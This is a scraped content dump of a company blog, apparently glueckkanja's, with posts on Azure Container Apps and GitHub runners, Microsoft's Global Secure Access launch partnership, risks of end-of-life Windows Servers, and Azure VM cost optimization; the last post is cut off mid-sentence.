Unlike AKS, Microsoft completely manages the underlying Kubernetes, including updates, upgrades, and scaling.",[12,6112,6113],{},[2642,6114],{"alt":6115,"src":6116},"Container Apps Basic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-container-apps-example-scenarios.png",[12,6118,6119],{},"ACA is based on an Azure Container App Environment, where Microsoft provides fully managed Kubernetes resources that applications can utilize. Different workload profiles offer various combinations of CPU/RAM and the option to use GPU systems.",[12,6121,6122],{},"The main advantage of this solution is that you can focus solely on your application and its specific configuration, without having to manage the cluster.",[12,6124,6125],{},"ACA offers versatile ways to easily connect applications with other Azure services. For example, FileShares from an Azure Storage Account can be integrated into your containers to secure persistent data between restarts or application version changes.",[12,6127,6128],{},"Another feature of ACA is A/B or Green/Blue testing, where two versions of an application are run simultaneously. Incoming traffic is split between the running instances, enabling quick insights into the current development stage and allowing immediate bug fixes.",[41,6130,6132],{"id":6131},"practical-example-github-runner-on-azure-container-apps","Practical Example: GitHub Runner on Azure Container Apps",[12,6134,31],{},[12,6136,6137],{},"A practical example: CI/CD workflows require an environment in which they can be executed. GitHub, as well as Azure DevOps and other providers, offer public agents where workflows can run. These runners are managed by GitHub and communicate through public endpoints. 
However, if you need access to internal resources or prefer not to work on public systems, these runners can also be operated in your own network.",[12,6139,6140],{},[2642,6141],{"alt":6142,"src":6143},"GitHub Workflow Classic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-basic.png",[12,6145,6146,6147,6152],{},"Traditionally, 24/7 running virtual machines were used for this purpose. Azure Container Apps offer a cost-efficient and scalable alternative. Using KEDA (",[2672,6148,6151],{"href":6149,"rel":6150},"https://keda.sh/",[2676],"Kubernetes Event Driven Autoscaler","), a connection to your own GitHub environment is established. ACA monitors whether a workflow has started, launches a container to execute the workflow, and then removes it afterwards. If no workflow is running, no container is started, keeping costs low.",[12,6154,6155],{},[2642,6156],{"alt":6157,"src":6158},"GitHub Workflow with Container Apps","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-container-app.png",[12,6160,6161],{},"The scalability of the solution is another advantage, as each workflow creates a separate container instance. Compared to a virtual machine, where usually only a single agent serves a workflow, this offers a flexible and efficient alternative.",[41,6163,4699],{"id":4698},[12,6165,31],{},[12,6167,6168],{},"Containers provide an excellent opportunity to modernize your own development and deployment of applications. 
Microsoft Azure, with its comprehensive portfolio of services, offers the right solution, whether you want to manage it yourself or fully focus on your application.",{"title":65,"searchDepth":111,"depth":111,"links":6170},[6171,6172,6173,6174],{"id":6056,"depth":111,"text":6057},{"id":6104,"depth":111,"text":6105},{"id":6131,"depth":111,"text":6132},{"id":4698,"depth":111,"text":4699},{"lang":2171,"seoTitle":6176,"titleClass":2173,"date":6177,"categories":6178,"blogtitlepic":6179,"socialimg":6180,"customExcerpt":6181,"keywords":6182,"contactInContent":6183,"hreflang":6201,"scripts":6206},"Optimizing cloud deployment: container solutions on Azure at a glance","2024-07-15",[4232],"head-containers-on-azure","/blog/heads/head-containers-on-azure.jpg","Faster, leaner, more efficient – container technology is transforming the way businesses develop and deploy software. Learn more about how Microsoft Azure serves as a leading platform for hosting containers and how it can significantly enhance the agility and scalability of your applications.","Azure Container Solutions, Microsoft Azure, Container Technology, CI/CD Integration, Kubernetes Management, Application Deployment, Cloud Services, Software Development, Scalable Infrastructure, DevOps Tools",{"quote":2168,"infos":6184},{"bgColor":5862,"color":5863,"boxBgColor":5864,"boxColor":5865,"headline":5933,"subline":6185,"level":41,"textStyling":2204,"flush":2205,"person":6186,"form":6191},"Would you like to learn more about containers on Azure? We would be happy to introduce our approach in person and support you with our experience in implementing container solutions. 
We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":6187},[6188,6189],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5266,"href":6190,"icon":5279},"mailto:sales@glueckkanja.com",{"ctaText":5281,"cta":6192,"method":2169,"action":2216,"fields":6193},{"skin":2215},[6194,6195,6196,6197,6198,6199,6200],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":5949},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[6202,6204],{"lang":2260,"href":6203},"/blog/azure/2024/07/containers-on-azure",{"lang":2263,"href":6205},"/blog/azure/2024/07/containers-on-azure-es",{"slick":2181,"form":2181},"/posts/2024-07-12-containers-on-azure",{"title":6041,"description":6047},"posts/2024-07-12-containers-on-azure",[4232,6211,6212,6213],"Cloud Technology","Development","CI/CD-Workflow","z7-Wuqnh4xd7LK7ECqsc8EMXj2vdJDSzWpUspJTuJUM",{"id":6216,"title":6217,"author":6218,"body":6219,"cta":2166,"description":6333,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6334,"moment":6336,"navigation":2181,"path":6368,"seo":6369,"stem":6370,"tags":6371,"webcast":2168,"__hash__":6373},"content_en/posts/2024-07-18-gsa-launch-partner.md","glueckkanja is Launch Partner for Microsoft's SSE Solution",[2373],{"type":9,"value":6220,"toc":6328},[6221,6230,6238,6241,6244,6247,6251,6253,6256,6262,6265,6279,6283,6285,6288,6291,6299,6305,6308,6311,6319,6323,6325],[12,6222,6223,6224,6229],{},"glueckkanja has been announced as one of the ",[2672,6225,6228],{"href":6226,"rel":6227},"https://learn.microsoft.com/en-us/entra/global-secure-access/how-to-find-microsoft-services-partners",[2676],"‘Product Launch Partners’"," for Microsoft's Security 
Service Edge (SSE) solution, Global Secure Access, including Microsoft Entra Internet & Private Access.",[12,6231,6232,6233,6237],{},"With many years of experience in a 100% cloud approach, we offer extensive support in implementing a consistent Zero Trust design, and ",[2672,6234,6236],{"href":6235},"/en/security/global-secure-access/","Global Secure Access"," fits seamlessly into this strategy! It is now a key component of our modern workplace and identity-centric security blueprint, starting from proof of concept to managed services.",[12,6239,6240],{},"We have been working on workplace and security projects for years, successfully separating clients from the data center and deploying highly efficient, secure cloud-managed clients. However, a modern 100% cloud client does not automatically eliminate legacy environments; it still needs to access services within them. In addition, many security teams believe that security capabilities are necessary beyond the client, within the network stack.",[12,6242,6243],{},"Unfortunately, in many projects, we observed our Future Workplace clients being integrated into the data center environments using outdated VPN solutions, and various 'Zero Trust' solutions were obstructing traffic between the clients and Microsoft 365.",[12,6245,6246],{},"We are therefore very pleased to be able to use from now on Entra Private Access, a genuine identity-centric Zero Trust Network Access for the most complex data center environments as a replacement for VPN solutions. Additionally, we will also use Entra Internet Access, an identity-centric Secure Web Gateway solution with Conditional Access integration, in our projects.",[41,6248,6250],{"id":6249},"what-is-global-secure-access","What is Global Secure Access?",[12,6252,31],{},[12,6254,6255],{},"Global Secure Access is designed to deliver security services through the cloud, supporting managed devices across all major platforms. 
This includes integration with identity providers and security tools such as XDR or SIEM.",[12,6257,6258],{},[2642,6259],{"alt":6260,"src":6261},"GSA Architecture","https://res.cloudinary.com/c4a8/image/upload/v1721295305/blog/pics/gsa-architecture.png",[12,6263,6264],{},"The architecture of the SSE solution is divided into two main areas, each with different components:",[1254,6266,6267,6273],{},[1257,6268,6269,6272],{},[251,6270,6271],{},"Internet Access"," features an identity-centered Secure Web Gateway (SWG) that functions similarly to a forward proxy. It not only protects against malware and other threats but also performs URL category filtering.",[1257,6274,6275,6278],{},[251,6276,6277],{},"Private Access"," is an identity-centered Zero Trust Network Access (ZTNA) solution that allows granular and consistent access to non-public applications regardless of their location, implementing detailed context-based access control.",[41,6280,6282],{"id":6281},"what-is-the-difference-between-global-secure-access-and-my-vpn-gateway-proxy","What is the difference between Global Secure Access and my VPN gateway / proxy?",[12,6284,31],{},[12,6286,6287],{},"Both Entra Internet Access and Entra Private Access feature Conditional Access integration, enabling strong authentication and device compliance enforcement, including Microsoft Defender for Endpoint integration, at the authentication layer. Microsoft is also working on additional enforcement mechanisms at the data layer through Continuous Access Evaluation to address advanced token theft scenarios.",[12,6289,6290],{},"Even newer VPN gateways typically cover the initial authentication of the user via RADIUS or SAML, granting access to the environment – often for an extended period – regardless of whether the user or client is involved in a security incident. 
This one-time authenticated access generally applies to the entire internal network, with the same set of rules applicable to all users.",[2110,6292,6293],{},[12,6294,6295,6298],{},[251,6296,6297],{},"Entra Private Access"," is designed to combine individual network segments into Enterprise Apps, then individually assign, authenticate and restrict users with Conditional Access.",[12,6300,6301],{},[2642,6302],{"alt":6303,"src":6304},"Full Tunnel vs App based Tunnel","https://res.cloudinary.com/c4a8/image/upload/v1721295307/blog/pics/tunnel-comparison.png",[12,6306,6307],{},"In my experience, the primary issue with secure web gateways is the poor integration with identity providers. While the early variants brought ADFS farms to their knees with masses of SAML requests causing massive disruptions, the providers have now moved to one-time authentication and then work with their own long-lived cookies.",[12,6309,6310],{},"The second major issue is the exclusion of Microsoft URLs and IPs from the proxy ruleset. This simply does not need a proxy between the client and trusted services such as M365, and in fact causes various problems and performance loss. I have yet to see a provider where this works without an accident.",[2110,6312,6313],{},[12,6314,6315,6318],{},[251,6316,6317],{},"Entra Internet Access"," is part of most enterprise cloud identity providers and has very strong Conditional Access integration.",[41,6320,6322],{"id":6321},"would-you-like-to-know-more-about-it","Would you like to know more about it?",[12,6324,31],{},[12,6326,6327],{},"We have extensive experience in the areas of identity, security, workplace and network. With Global Secure Access, we bring all these aspects together. Say goodbye to outdated VPN and web proxy solutions and take full advantage of the possibilities of Microsoft's SSE solution. 
We look forward to hearing from you!",{"title":65,"searchDepth":111,"depth":111,"links":6329},[6330,6331,6332],{"id":6249,"depth":111,"text":6250},{"id":6281,"depth":111,"text":6282},{"id":6321,"depth":111,"text":6322},"glueckkanja has been announced as one of the ‘Product Launch Partners’ for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, including Microsoft Entra Internet & Private Access.",{"lang":2171,"seoTitle":6335,"titleClass":2173,"date":6336,"categories":6337,"blogtitlepic":6338,"socialimg":6339,"customExcerpt":6340,"keywords":6341,"contactInContent":6342,"hreflang":6362,"scripts":6367},"glueckkanja is Product Launch Partner for Microsoft’s Security Service Edge (SSE) solution","2024-07-18",[2176],"head-global-secure-access","/blog/heads/head-global-secure-access.jpg","Thrilled to announce our role as ‘Product Launch Partner' for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, which includes Microsoft Entra Internet & Private Access. Our collaboration with Microsoft in several private previews has refined these features to benefit not just our teams but also our customers, integrating their needs into a seamless and secure cloud experience. Discover how our expertise in a 100% cloud-based approach and Zero Trust design is transforming modern workplace and identity-centric security.","Global Secure Access, SSE, Microsofts SSE, Private Access, Internet Access, VPN replacement, Zero Trust Network Access, Network security",{"quote":2168,"infos":6343},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":6346,"level":41,"textStyling":2204,"flush":2205,"person":6347,"form":6351},"var(--color-gigas)","var(--color-yellow)","Would you like to learn more about Microsoft's SSE Solution? We would be happy to introduce our approach in person and support you with our experience in implementing this solution. 
We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":6348},[6349,6350],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":6352,"method":2169,"action":2216,"fields":6353},{"skin":2215},[6354,6355,6356,6357,6358,6360,6361],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":6359},"Request Global Secure Access",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[6363,6365],{"lang":2260,"href":6364},"/blog/security/2024/07/gsa-launch-partner",{"lang":2263,"href":6366},"/blog/security/2024/07/gsa-launch-partner-es",{"slick":2181,"form":2181},"/posts/2024-07-18-gsa-launch-partner",{"title":6217,"description":6333},"posts/2024-07-18-gsa-launch-partner",[6236,5300,6372,2176],"VPN Replacement","UAgoECjMn2OaYdCrQRJ8_UKxwgG95bTCpZJLgVD5-7U",{"id":6375,"title":6376,"author":6377,"body":6378,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6668,"moment":6669,"navigation":2181,"path":6698,"seo":6699,"stem":6700,"tags":6701,"webcast":2168,"__hash__":6707},"content_en/posts/2024-10-17-end-of-support-operating-systems.md","Why Your Outdated Windows Servers Are Putting Your Business at Risk",[2515],{"type":9,"value":6379,"toc":6656},[6380,6384,6386,6389,6392,6396,6398,6404,6410,6413,6421,6425,6427,6430,6442,6445,6448,6451,6454,6458,6460,6464,6466,6469,6478,6484,6488,6490,6493,6496,6507,6513,6519,6525,6529,6531,6536,6539,6545,6553,6557,6559,6562,6565,6568,6571,6574,6578,6580,6583,6586,6635,6641,6644,6647,6650],[41,6381,6383],{"id":6382},"windows-servers-vs-airplane","Windows Servers vs 
Airplane",[12,6385,31],{},[12,6387,6388],{},"Imagine boarding an airplane that’s long out of service, plagued with over 35 critical mechanical issues. Would you still feel safe? Now think of your Windows Server 2012 R2. It’s essentially that same outdated airplane, riddled with vulnerabilities, but this time, it’s your organization’s infrastructure on the line.",[12,6390,6391],{},"It’s time to act – don’t waste any more time. Your flight is booked, but it’s at serious risk.",[41,6393,6395],{"id":6394},"understand-the-security-implications-and-potential-impact","Understand the Security Implications and Potential Impact",[12,6397,31],{},[12,6399,6400,6403],{},[251,6401,6402],{},"Security Score Impact:"," End-of-Life (EOL) systems significantly lower your organization’s overall security score.",[12,6405,6406,6409],{},[251,6407,6408],{},"Massive Risk:"," These systems are highly vulnerable to attacks due to the absence of updates and vendor support, posing a severe threat to the entire corporate environment.",[12,6411,6412],{},"Attackers love EOL operating systems, as they serve as open invitations to gain a foothold in your network, potentially leading to a full infrastructure compromise.",[12,6414,6415,6416,6420],{},"While our ",[2672,6417,6419],{"href":6418},"/en/security/are-you-under-attack/","APT Response services"," can help you recover, we always advocate for a proactive approach—one that ensures you never face such a situation in the first place.",[41,6422,6424],{"id":6423},"identify-eol-systems-in-your-organization","Identify EOL Systems in Your Organization",[12,6426,31],{},[12,6428,6429],{},"Discovery & Methods to Identify End-of-Life (EOL) Operating Systems",[12,6431,6432,6433,6437,6438,6441],{},"Start with discovery. 
We frequently uncover End-of-Life (EOL) operating systems during our assessments, whether through ",[2672,6434,6436],{"href":6435},"/en/security/preventive-services/","preventive services like AD/EID"," or our ",[2672,6439,6440],{"href":5241},"managed CSOC offerings",". The first step in addressing this issue is developing reliable methods to identify EOL systems and take action.",[12,6443,6444],{},"It’s crucial to establish a strategy for regularly identifying these outdated systems using various tools and assessments. We can partner with you to implement this effectively.",[12,6446,6447],{},"One key step is identifying your Line of Business (LOB) applications and determining where they’re running to ensure alignment with your business needs. The risk-based LOB triangle is a valuable tool that helps uncover dependencies and assess risks throughout your organization.",[12,6449,6450],{},"By analyzing loss patterns and volatility over time, this approach becomes a cornerstone of effective risk management, delivering essential insights to your management team. This is especially critical when super-sensitive LOBs, sitting at the top of the triangle, are operating on EOL systems. 
These systems pose a significant threat to service continuity, operational stability, and overall business performance.",[12,6452,6453],{},"In short, if your most critical LOBs are running on EOL systems, you’re exposing your company to the risk of service disruption and elevated operational dangers.",[41,6455,6457],{"id":6456},"building-an-outdated-operating-system-strategy","Building an Outdated Operating System Strategy",[12,6459,31],{},[186,6461,6463],{"id":6462},"short-term-solution-esu-could-be-your-friend","Short-Term Solution: ESU Could Be Your Friend",[12,6465,47],{},[12,6467,6468],{},"Address vulnerabilities by implementing a short-term solution and simultaneously work on a long-term strategy to handle End-of-Life (EOL) and End-of-Support (EOS) systems.",[12,6470,6471,6472,6477],{},"Use ",[2672,6473,6476],{"href":6474,"rel":6475},"https://www.microsoft.com/en-us/windows-server/extended-security-updates",[2676],"Extended Security Updates (ESU)"," as a lifesaver to get through this challenging period. ESU can temporarily secure EOL systems until migration or decommissioning is completed. Remember, this is just a short-term workaround.",[12,6479,6480,6483],{},[251,6481,6482],{},"Isolation:"," Completely isolate these systems from networks and Active Directory during the transition period. This gives you the time to plan and execute your migration without exposing yourself to severe risks, creating a more manageable situation.",[186,6485,6487],{"id":6486},"build-a-long-term-strategy","Build a Long-Term Strategy",[12,6489,47],{},[12,6491,6492],{},"After addressing immediate concerns with ESU, it's time to shift focus towards a long-term strategy to phase out legacy systems. 
Take a moment to evaluate the best long-term solutions that align with your needs.",[12,6494,6495],{},"Consider migration to modern operating systems, serverless approaches, Software as a Service (SaaS), or any cloud-native solutions that are tailored to your environment.",[12,6497,6498,6501,6502,6506],{},[251,6499,6500],{},"Migration:"," Plan and execute the upgrade of outdated systems to the latest versions. Evaluate alternatives such as serverless, containers, or Kubernetes (K8s). glueckkanja's ",[2672,6503,6505],{"href":6504},"/en/azure/migrate-to-the-cloud","Azure Foundation Blueprint"," provides a solid framework for your cloud migration. Using Infrastructure-as-Code deployment, we ensure a fast implementation with the highest quality. Security and governance requirements are directly embedded in the platform, and built-in controls such as policies and automation replace outdated, costly processes and workflows.",[12,6508,6509,6512],{},[251,6510,6511],{},"Decommissioning:"," Safely decommission unsupported systems.\nBy following this approach, you mitigate immediate risks while planning for sustainable, long-term security improvements. If you need further details or assistance, feel free to reach out!",[12,6514,6515,6518],{},[251,6516,6517],{},"Long-Term Target:"," In the future, ensure you are prepared well in advance of your systems reaching End of Life (EOL).",[12,6520,6521,6524],{},[251,6522,6523],{},"Get in contact with our Azure experts:"," Plan and execute a successful cloud migration with our guidance. glueckkanja holds the Azure Advanced Specialization for Infrastructure and Database Migration. 
Customers can also take advantage of the Azure Migration and Modernization Program (AMM) for comprehensive migration support.",[41,6526,6528],{"id":6527},"know-about-os-support-lifecycle","Know About OS Support Lifecycle",[12,6530,31],{},[12,6532,6533],{},[251,6534,6535],{},"Regularly review the support lifecycle and timeline for each operating system (OS) to ensure compliance and proactive risk management.",[12,6537,6538],{},"Microsoft provides consistent and predictable guidelines for their products, whether it’s server OS, client OS, or other products like Exchange, SQL, and many more.",[12,6540,6541,6542,1013],{},"This enables strategic planning for the future. Always stay informed about the OS and software support lifecycle. Regular reviews help you stay compliant and proactively manage risks. With Defender for Endpoint, these reviews are simplified. Monitoring vulnerabilities and identifying End-of-Life systems are integral parts of our ",[2672,6543,6544],{"href":4296},"CSOC Service",[12,6546,6547,6548,1013],{},"Get an overview of the ",[2672,6549,6552],{"href":6550,"rel":6551},"https://learn.microsoft.com/en-us/lifecycle/",[2676],"Microsoft Lifecycle Policy",[41,6554,6556],{"id":6555},"conclusion-dont-wait-for-the-press-to-write-your-story","Conclusion: Don’t Wait for the Press to Write Your Story",[12,6558,31],{},[12,6560,6561],{},"The message is loud and clear: don’t wait for service interruptions or compromises.",[12,6563,6564],{},"We hope to see only positive news about your enterprise in the press. While we offer APT Response services, we strongly encourage you – and all our customers – to engage with us proactively, rather than reacting to a security breach.",[12,6566,6567],{},"The essence of this article is to urge you to shift from a reactive stance to preparing your business for the next level. Future-proof your organization by maintaining up-to-date platforms or adopting cloud-native solutions. 
All stakeholders, including your customers and management, will appreciate this proactive approach.",[12,6569,6570],{},"Management, in particular, should be fully aware of their responsibilities and liabilities in ensuring the company’s operational stability and security.",[12,6572,6573],{},"Take advantage of our Azure, Workplace, and Security offerings – feel free to reach out to us!",[41,6575,6577],{"id":6576},"appendix-windows-server-2012-r2-windows-server-2008-r2-number-of-vulnerabilities","Appendix - Windows Server 2012 R2 - Windows Server 2008 R2 - Number of Vulnerabilities",[12,6579,31],{},[12,6581,6582],{},"The table below highlights the known vulnerabilities, which continue to increase by over 20 each month.",[2127,6584,6585],{},"\ntable {\n  font-family: arial, sans-serif;\n  border-collapse: collapse;\n  width: 100%;\n}\n\ntd, th {\n  border: 1px solid #dddddd;\n  text-align: left;\n  padding: 8px;\n}\n\ntr:nth-child(even) {\n  background-color: #dddddd;\n}\n",[417,6587,420,6588],{},[438,6589,6590,420,6601,420,6613,420,6625],{},[426,6591,424,6592,424,6595,424,6598,420],{},[430,6593,6594],{},"Operating System",[430,6596,6597],{},"Windows Server 2012 R2",[430,6599,6600],{},"Windows Server 2008 R2",[426,6602,424,6603,424,6606,424,6610,420],{},[443,6604,6605],{},"Total # of Vulnerabilities*",[443,6607,6609],{"style":6608},"text-align: center;","1.142",[443,6611,6612],{"style":6608},"2.240",[426,6614,424,6615,424,6618,424,6622,420],{},[443,6616,6617],{},"Critical",[443,6619,6621],{"style":6620},"text-align: center; color: red;","35",[443,6623,6624],{"style":6620},"47",[426,6626,424,6627,424,6629,424,6632,420],{},[443,6628,4748],{},[443,6630,6631],{"style":6608},"806",[443,6633,6634],{"style":6608},"1.457",[12,6636,6637],{},[6638,6639,6640],"small",{},"Data as of September 2024, with a growing number of vulnerabilities month-over-month",[12,6642,6643],{},"As of September 2024, Windows Server 2012 R2 is missing 1,142 vulnerabilities (see bullet point 1), which 
remain unaddressed or unpatched. This number is steadily growing month over month, with 35 classified as critical and 806 as high severity (see bullet point 2).",[12,6645,6646],{},"The situation is even more concerning for Windows Server 2008 R2, with an even larger number of known vulnerabilities. This creates an inviting opportunity for attackers, giving them a clear path to potential compromises.",[12,6648,6649],{},"This data is sourced from Microsoft Defender for Endpoint, which provides a comprehensive overview and valuable insights into system vulnerabilities.",[12,6651,6652],{},[2642,6653],{"alt":6654,"src":6655},"Microsoft Defender for Endpoint Vulnerabilities","https://res.cloudinary.com/c4a8/image/upload/blog/pics/defender-portal-vulnerabilites.png",{"title":65,"searchDepth":111,"depth":111,"links":6657},[6658,6659,6660,6661,6665,6666,6667],{"id":6382,"depth":111,"text":6383},{"id":6394,"depth":111,"text":6395},{"id":6423,"depth":111,"text":6424},{"id":6456,"depth":111,"text":6457,"children":6662},[6663,6664],{"id":6462,"depth":329,"text":6463},{"id":6486,"depth":329,"text":6487},{"id":6527,"depth":111,"text":6528},{"id":6555,"depth":111,"text":6556},{"id":6576,"depth":111,"text":6577},{"lang":2171,"seoTitle":6376,"titleClass":2173,"date":6669,"categories":6670,"blogtitlepic":6671,"socialimg":6672,"customExcerpt":6673,"keywords":6341,"contactInContent":6674,"hreflang":6692,"scripts":6697},"2024-10-17",[2176],"head-end-of-support","/blog/heads/head-end-of-support.jpg","Would you trust an airplane with critical failures to get you safely to your destination? Then why trust your Windows Server 2012 R2 to keep your business secure? With over 35 critical vulnerabilities, running end-of-life systems could be your organization's greatest risk. 
Discover how to protect your infrastructure before it’s too late – because in today’s threat landscape, there’s no room for error.",{"quote":2168,"infos":6675},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":6676,"level":41,"textStyling":2204,"flush":2205,"person":6677,"form":6681},"Would you like to learn more about End-of-Life (EOL) and End-of-Support (EOS) systems? Feel free to reach out! We look forward to hearing from you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":6678},[6679,6680],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":6682,"method":2169,"action":2216,"fields":6683},{"skin":2215},[6684,6685,6686,6687,6688,6690,6691],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":6689},"Request EOS EOL Systems",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[6693,6695],{"lang":2260,"href":6694},"/blog/security/2024/10/end-of-support-operating-systems-de",{"lang":2263,"href":6696},"/blog/security/2024/10/end-of-support-operating-systems-es",{"slick":2181,"form":2181},"/posts/2024-10-17-end-of-support-operating-systems",{"title":6376,"description":65},"posts/2024-10-17-end-of-support-operating-systems",[6702,6703,6704,6705,6706],"Cyber Security","Windows Server","Security Risk","Vulnerability Management","Security 
Score","gjgtYVh9nyhWhkTN-15QwMTcyhVJZl-ZpRC9LJAI6t0",{"id":6709,"title":6710,"author":6711,"body":6712,"cta":2166,"description":6718,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":6987,"moment":6989,"navigation":2181,"path":7001,"seo":7002,"stem":7003,"tags":7004,"webcast":2168,"__hash__":7007},"content_en/posts/2024-11-11-vm-cost-optimization-on-azure.md","How to Keep Your Azure VM Costs Under Control",[2510],{"type":9,"value":6713,"toc":6977},[6714,6719,6722,6726,6728,6731,6734,6748,6754,6758,6760,6763,6774,6777,6780,6789,6798,6802,6804,6807,6811,6813,6816,6819,6827,6833,6841,6846,6855,6861,6865,6867,6870,6878,6883,6891,6902,6910,6926,6930,6932,6935,6949,6955,6958,6961,6966,6969,6971,6974],[12,6715,6716],{},[251,6717,6718],{},"\"Why Are My Virtual Machines (VMs) in Azure So Expensive? I Thought the Cloud Was Supposed to Be Cheaper!\"",[12,6720,6721],{},"This is a statement we frequently hear from customers—especially those who have migrated their IT infrastructure to the cloud using a \"lift & shift\" approach without making any adjustments. 
Without proper optimization, the cloud can indeed end up being more costly than expected.",[41,6723,6725],{"id":6724},"do-you-even-need-a-vm","Do You Even Need a VM?",[12,6727,31],{},[12,6729,6730],{},"This is the first question to ask: Is a VM truly necessary for the task at hand, or could a cloud-native service like Azure Functions or a Kubernetes cluster be a better fit?",[12,6732,6733],{},"That said, there are valid reasons to stick with a VM:",[1254,6735,6736,6739,6742,6745],{},[1257,6737,6738],{},"Requirements set by software vendors",[1257,6740,6741],{},"Lack of expertise within the organization to transition applications",[1257,6743,6744],{},"Staff shortages",[1257,6746,6747],{},"Other specific needs",[12,6749,6750,6751,6753],{},"So, how can costs be optimized when a VM is unavoidable?",[531,6752],{},"\nHere are some effective strategies.",[41,6755,6757],{"id":6756},"the-biggest-cost-drivers-for-vms","The Biggest Cost Drivers for VMs",[12,6759,31],{},[12,6761,6762],{},"The cost of VMs in Azure is primarily influenced by the following factors:",[1254,6764,6765,6768,6771],{},[1257,6766,6767],{},"Runtime",[1257,6769,6770],{},"Assigned SKU (Virtual Machine Size)",[1257,6772,6773],{},"Operating system licenses",[12,6775,6776],{},"The bulk of the expense comes from the resources consumed during runtime. As long as a VM is active and utilizing CPU and RAM resources, costs accrue—whether the VM is fully utilized or idle. When a VM is turned off, charges are reduced to the storage used.",[12,6778,6779],{},"Each VM in Azure is tied to a specific SKU, which defines its configuration in terms of CPU and RAM. Different SKUs are optimized for different use cases, such as a high CPU-to-RAM ratio for compute-intensive tasks.",[12,6781,6782,6783,6785,6788],{},"The SKU name typically reveals its configuration.",[531,6784],{},[251,6786,6787],{},"Example:"," A VM in the D-series is designed for a balanced ratio of CPU to RAM, typically 4 GB of RAM per CPU core. 
For instance, Standard_D4s_v5 offers 4 CPU cores and 16 GB of RAM. The \"s\" denotes support for premium SSD storage.",[12,6790,6791,6792,6797],{},"Microsoft provides a ",[2672,6793,6796],{"href":6794,"rel":6795},"https://learn.microsoft.com/en-us/azure/virtual-machines/sizes/overview?tabs=breakdownseries%2Cgeneralsizelist%2Ccomputesizelist%2Cmemorysizelist%2Cstoragesizelist%2Cgpusizelist%2Cfpgasizelist%2Chpcsizelist",[2676],"comprehensive list"," of all available SKUs, complete with detailed performance metrics.",[41,6799,6801],{"id":6800},"how-to-optimize-vm-costs","How to Optimize VM Costs",[12,6803,31],{},[12,6805,6806],{},"To reduce VM costs, focus on the following areas:",[186,6808,6810],{"id":6809},"resource-allocation","Resource Allocation",[12,6812,47],{},[12,6814,6815],{},"The first key question: Is the current VM assigned to the optimal SKU?",[12,6817,6818],{},"This can be determined by reviewing the VM metrics in the Azure portal. It may reveal that the chosen VM size is oversized, or that the resources are fully utilized only during certain periods, leaving the VM idle for much of the month. Perhaps the VM is assigned to the wrong SKU series, and an option with more RAM per CPU core would be more suitable.",[12,6820,6821,6824,6826],{},[251,6822,6823],{},"Example: Intermittent Usage",[531,6825],{},"\nA typical scenario might involve monthly billing runs in an ERP system. The VM is heavily utilized once a month for processing invoices but is otherwise used sporadically for less intensive data queries.",[12,6828,6829,6832],{},[251,6830,6831],{},"Solution:"," Scale the VM down to a smaller SKU for most of the month and temporarily scale it up during billing cycles. Azure makes it easy to adjust VM sizes within the same series with minimal downtime.",[12,6834,6835,6838,6840],{},[251,6836,6837],{},"Example: Wrong SKU",[531,6839],{},"\nAnother scenario: An application requires 64 GB of RAM but only 4 CPU cores. 
If the VM is mistakenly configured as Standard_D16s_v5, it includes 16 CPU cores—far more than needed.",[12,6842,6843,6845],{},[251,6844,6831],{}," Switching to a SKU like Standard_E8-4s_v5 would provide the same 64 GB of RAM with only 4 CPU cores.",[12,6847,6848,6849,6854],{},"Using the ",[2672,6850,6853],{"href":6851,"rel":6852},"https://azure.microsoft.com/en-us/pricing/calculator/",[2676],"Azure Pricing Calculator",", you can quickly identify potential savings. The difference could exceed $500 per month.",[12,6856,6857],{},[2642,6858],{"alt":6859,"src":6860},"VM Cost Comparison","https://res.cloudinary.com/c4a8/image/upload/blog/pics/vm-cost-optimization.png",[186,6862,6864],{"id":6863},"optimizing-vm-runtime","Optimizing VM Runtime",[12,6866,47],{},[12,6868,6869],{},"In the cloud, VMs incur costs based on active CPU and RAM usage. On-premises, VMs often ran 24/7 since it had little impact on costs. In the cloud, however, it’s worth asking: Does the VM need to run 24/7?",[12,6871,6872,6875,6877],{},[251,6873,6874],{},"Example: 12/5 Usage",[531,6876],{},"\nConsider a VM whose application isn’t used overnight or on weekends. Continuous availability isn’t 